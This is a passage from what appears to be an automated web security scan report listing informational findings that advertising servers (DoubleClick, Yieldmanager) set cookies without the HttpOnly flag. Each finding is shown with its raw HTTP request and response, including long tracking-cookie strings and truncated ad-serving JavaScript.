Set-Cookie: id=c7adf3c3c0000b8||t=1316221822|et=730|cs=002213fd48b210656f748fd522; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:10:22 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:10:22 GMT
Date: Sat, 17 Sep 2011 01:10:22 GMT
Expires: Sat, 17 Sep 2011 01:10:22 GMT
Cache-Control: private

document.write('');

var pubId=27330;
var siteId=27331;
var kadId=23102;
var kadwidth=300;
var kadheight=250;
var kadtype=1;

document.write('\n<script type=\"text/javascript\" src=\"http://ads.pubmat
...[SNIP]...

12.54. http://ad.doubleclick.net/adj/q1.bosherald/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/q1.bosherald/news

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.bosherald/news;net=q1;u=,q1-30416237379_1316221208,,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464?? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5442
Set-Cookie: id=c7adf3c3c0000bb||t=1316221823|et=730|cs=002213fd48c58f2052188f45a2; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:10:23 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:10:23 GMT
Date: Sat, 17 Sep 2011 01:10:23 GMT
Expires: Sat, 17 Sep 2011 01:10:23 GMT
Cache-Control: private

document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');

fun
...[SNIP]...

12.55. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_hookups  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/tmz.category.wb.dart/celebrity_hookups

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/tmz.category.wb.dart/celebrity_hookups;boxad=1;pos=atf;tile=1;dcopt=ist;sz=728x90,970x250,948x250,970x66;qcseg=D;ord=362463614437729.1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 281
Set-Cookie: id=ca1cd3c3c0000a9||t=1316221132|et=730|cs=002213fd48eb3ee1c1d9cb15bb; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 00:58:52 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 00:58:52 GMT
Date: Sat, 17 Sep 2011 00:58:53 GMT
Expires: Sat, 17 Sep 2011 00:58:53 GMT
Cache-Control: private

document.write('');

admeld_publisher = 221;
admeld_site = 'tmz';
admeld_size = '728x90';
admeld_placement = 'ros';
admeld_no_iframe = true;

document.write('\n<script type=\"text/javas
...[SNIP]...

12.56. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_justice  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/tmz.category.wb.dart/celebrity_justice

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/tmz.category.wb.dart/celebrity_justice;boxad=1;pos=atf;tile=1;dcopt=ist;sz=728x90,970x250,948x250,970x66;qcseg=D;ord=6496930022258312 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7086
Set-Cookie: id=c16d03c3c0000e6||t=1316221226|et=730|cs=002213fd483f04ced38c13e383; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:00:26 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:00:26 GMT
Date: Sat, 17 Sep 2011 01:00:26 GMT
Expires: Sat, 17 Sep 2011 01:00:26 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Sep 16 20:01:17 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...

12.57. http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B245892120%3B0-0%3B0%3B69485624%3B4986-300/600%3B43918246/43936033/1%3B%3B~okv%3D%3Bpc%3DDFP245079213%3B%3B~fdr%3D245079213%3B0-0%3B0%3B61866028%3B4986-300/600%3B44072410/44090197/1%3B%3B~sscs%3D%3fhttp://t.mookie1.com/t/v1/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click%3Bh%3Dv8/3b85/3/0/%2a/w%3B245892120%3B0-0%3B0%3B69485624%3B4986-300/600%3B43918246/43936033/1%3B%3B~okv%3D%3Bpc%3DDFP245079213%3B%3B~fdr%3D245079213%3B0-0%3B0%3B61866028%3B4986-300/600%3B44072410/44090197/1%3B%3B~sscs%3D%3fhttp://t.mookie1.com/t/v1/clk

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click%3Bh%3Dv8/3b85/3/0/%2a/w%3B245892120%3B0-0%3B0%3B69485624%3B4986-300/600%3B43918246/43936033/1%3B%3B~okv%3D%3Bpc%3DDFP245079213%3B%3B~fdr%3D245079213%3B0-0%3B0%3B61866028%3B4986-300/600%3B44072410/44090197/1%3B%3B~sscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=157&migSource=adsrv2&migTrackDataExt=1249573;69485624;245892120;43918246&migRandom=6620679&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://abc.go.com/shows/charlies-angels HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1249573/CA_300x600.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=157&migSource=adsrv2&migTrackDataExt=1249573;69485624;245892120;43918246&migRandom=6620679&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://abc.go.com/shows/charlies-angels
Set-Cookie: id=ccfcf3c3c000034|1249573/915341/15234|t=1316221297|et=730|cs=002213fd48a1a7cd298395cfac; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:01:37 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:01:37 GMT
Date: Sat, 17 Sep 2011 01:01:37 GMT
Server: GFE/2.0
Content-Type: text/html


12.58. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?anmember=514&anprice=&Z=300x250&s=2298003&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F&u=http://www.tmz.com/ HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!$%00!!#RS!$XpC!1R*F!%`E+!!!!$!?5%!)H`@:!wVd.!%FMM!'lGU!'m1A~~~~~=4jht=6h5P~"; ih="b!!!!>!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1R*F!!!!#=4jht!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2/j6!!!!#=4qsr!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; bh="b!!!#v!!-C,!!!!%=3`c_!!-G2!!!!%=5$1G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!$=57ob!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4u!!!!#=54Pi!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!x^1!!!!$=5,??!!y)?!!!!#=3*$x!##!)!!!!$=5#lv!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#6]*!!!!$=5#lv!#7wf!!!!#=51w'!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q/x!!!!#=5,(/!#Q]:!!!!#=4YXv!#Q_h!!!!$=3gb9!#QoI!!!!#=5,',!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#T<,!!!!$=5,??!#UD`!!!!$=3**U!#UL(!!!!#=5$1H!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!$=4X0s!#eCK!!!!$=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#qq%!!!!#=4jf'!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#v5N!!!!$=5#lm!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$'.I!!!!$=5$1G!$'.K!!!!#=5$1G!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-`?!!!!#=4jeq!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!)=4_L-!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:jo!!!!%=5,9,!$<DI!!!!#=3G@^!$<Rh!!!!#=5$$X!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:20 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0228.rm.sp2
Set-Cookie: ih="b!!!!?!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1R*F!!!!#=4jht!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2/j6!!!!#=4qsr!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e$^!!!!%=57op!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; path=/; expires=Mon, 16-Sep-2013 00:52:20 GMT
Set-Cookie: vuday1=8ac=%N5HGH?9-O6; path=/; expires=Sun, 18-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!-!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!$%00!!#RS!$XpC!1R*F!%`E+!!!!$!?5%!)H`@:!wVd.!%FMM!'lGU!'m1A~~~~~=4jht=6h5P~!$7w.!!%f!!%d(@!3e$^!'/%f!!mT+~)I#R@!ZmB)!(XE3!(Gex~~~~~~=57op=9KZ!!!.vL"; path=/; expires=Mon, 16-Sep-2013 00:52:20 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246"; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: uid=uid=4c3de2f4-e0c7-11e0-8bca-78e7d1fa057c&_hmacv=1&_salt=2778919201&_keyid=k1&_hmac=fc8a7e52cbed13949d4f7788b66fc642218cb2d1; path=/; expires=Mon, 17-Oct-2011 00:52:20 GMT
Set-Cookie: liday1=x6!2#N5HGH:SAxO; path=/; expires=Sun, 18-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 00:52:20 GMT
Pragma: no-cache
Content-Length: 2519
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<span id="10288627">');
//raw JavaScript
document.write('<scr'+'ipt language=\'javascr'+'ipt\' type=\'text/javascr'+'ipt\' src=\'http://imp.fetchback.com/serve/fb/adtag.js?tid=6832
...[SNIP]...

12.59. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=128282&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!$%00!!#RS!$XpC!1R*F!%`E+!!!!$!?5%!)H`@:!wVd.!%FMM!'lGU!'m1A~~~~~=4jht=6h5P~"; ih="b!!!!>!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1R*F!!!!#=4jht!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2/j6!!!!#=4qsr!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; bh="b!!!#v!!-C,!!!!%=3`c_!!-G2!!!!%=5$1G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4u!!!!#=54Pi!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!x^1!!!!$=5,??!!y)?!!!!#=3*$x!##!)!!!!$=5#lv!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#6]*!!!!$=5#lv!#7wf!!!!#=51w'!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q/x!!!!#=5,(/!#Q]:!!!!#=4YXv!#Q_h!!!!$=3gb9!#QoI!!!!#=5,',!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#T<,!!!!$=5,??!#UD`!!!!$=3**U!#UL(!!!!#=5$1H!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!$=4X0s!#eCK!!!!$=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#qq%!!!!#=4jf'!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#v5N!!!!$=5#lm!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$'.I!!!!$=5$1G!$'.K!!!!#=5$1G!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-`?!!!!#=4jeq!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[H